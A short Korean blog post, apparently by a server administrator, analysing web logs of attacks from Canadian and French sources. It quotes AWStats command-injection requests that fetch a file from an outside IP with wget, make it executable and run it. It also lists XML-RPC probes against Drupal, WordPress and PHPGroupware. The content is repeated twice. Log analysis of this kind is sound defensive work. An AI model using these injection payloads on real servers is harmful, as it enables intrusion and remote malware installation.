최근 벨 캐나다와 프랑스 쪽에서 심심찮게 웹 해킹 공격이 들어오는데 로그를 분석해보면 다음과 같다.
1. AWSTAT 취약점 공격
"GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 159 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 159 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 167 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
2. PHP XML-RPC 취약점 공격
"POST /xmlrpc.php HTTP/1.1" 404 151 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /blog/xmlrpc.php HTTP/1.1" 404 156 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 163 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 164 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /drupal/xmlrpc.php HTTP/1.1" 404 158 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 164 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /wordpress/xmlrpc.php HTTP/1.1" 404 161 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /xmlrpc.php HTTP/1.1" 404 151 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 158 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 158 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
드루팔, PHPGroupware, 워드프레스 등에 대한 공격이다.
1. AWSTAT 취약점 공격
"GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 159 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 159 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 167 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
2. PHP XML-RPC 취약점 공격
"POST /xmlrpc.php HTTP/1.1" 404 151 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /blog/xmlrpc.php HTTP/1.1" 404 156 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 163 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 164 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /drupal/xmlrpc.php HTTP/1.1" 404 158 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 164 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /wordpress/xmlrpc.php HTTP/1.1" 404 161 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /xmlrpc.php HTTP/1.1" 404 151 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 158 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 158 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
드루팔, PHPGroupware, 워드프레스 등에 대한 공격이다.
덧글